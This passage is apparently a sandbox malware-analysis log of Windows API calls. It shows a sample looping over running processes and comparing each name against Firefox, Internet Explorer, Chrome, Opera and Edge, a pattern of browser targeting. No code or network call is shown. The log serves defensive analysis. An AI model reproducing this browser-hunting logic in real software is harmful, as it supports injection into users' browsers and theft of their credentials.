dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.991] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0218.991] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0218.991] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0218.991] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0218.991] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.991] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0218.992] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0218.992] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0218.992] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0218.992] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0218.992] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0218.992] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0218.993] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0218.993] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0218.993] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0218.993] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0218.993] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0218.993] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0218.993] CloseHandle (hObject=0xe8) returned 1 [0218.993] Sleep (dwMilliseconds=0x3e8) [0220.031] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0220.033] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.034] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0220.034] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0220.034] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0220.034] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0220.034] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0220.034] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0220.034] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0220.034] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0220.034] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0220.034] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0220.034] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0220.034] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0220.035] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0220.035] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0220.035] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0220.035] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0220.035] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.035] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.035] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0220.036] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0220.036] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0220.036] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0220.036] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.036] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0220.036] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0220.036] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0220.036] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0220.036] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0220.036] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.036] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0220.037] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0220.037] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0220.037] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0220.037] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0220.037] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.037] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0220.037] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0220.037] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0220.037] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0220.037] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0220.037] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.037] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0220.038] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0220.038] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0220.038] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0220.038] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0220.038] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.038] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0220.038] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0220.038] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0220.038] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0220.039] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0220.039] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.039] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0220.039] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0220.039] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0220.039] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0220.039] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0220.039] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.039] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.040] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0220.040] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0220.040] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0220.040] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0220.040] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.040] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.040] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0220.040] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0220.040] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0220.040] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0220.040] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.040] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.041] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0220.041] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0220.041] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0220.041] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0220.041] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.041] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.041] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0220.041] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0220.041] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0220.041] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0220.041] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.041] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.042] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0220.042] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0220.042] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0220.042] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0220.042] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.042] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0220.043] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0220.043] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0220.043] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0220.043] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0220.043] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.043] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.043] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0220.043] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0220.043] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0220.043] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0220.043] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.043] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.044] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0220.044] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0220.044] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0220.044] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0220.044] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.044] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0220.044] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0220.044] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0220.044] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0220.044] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0220.044] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.044] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0220.045] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0220.045] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0220.045] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0220.045] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0220.045] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.045] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0220.045] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0220.045] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0220.045] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0220.045] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0220.046] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.046] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0220.046] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0220.046] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0220.046] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0220.046] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0220.046] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.046] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0220.047] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0220.047] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0220.047] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0220.047] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0220.047] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.047] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0220.047] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0220.047] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0220.047] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0220.047] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0220.047] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.047] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0220.048] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0220.048] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0220.048] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0220.048] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0220.048] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.048] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0220.049] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0220.049] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0220.049] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0220.049] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0220.049] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.049] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0220.049] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0220.049] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0220.049] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0220.049] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0220.049] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.049] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0220.050] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0220.050] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0220.050] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0220.050] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0220.050] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.050] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0220.050] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0220.050] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0220.050] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0220.050] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0220.050] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.050] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0220.051] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0220.051] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0220.051] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0220.051] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0220.051] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.051] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0220.051] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0220.051] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0220.051] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0220.051] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0220.052] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.052] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0220.052] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0220.052] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0220.052] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0220.052] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0220.052] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0220.052] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0220.053] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0220.053] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0220.053] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0220.053] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0220.053] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0220.053] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0220.053] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0220.053] lstrcmpiA (lpString1="ruby.exe", 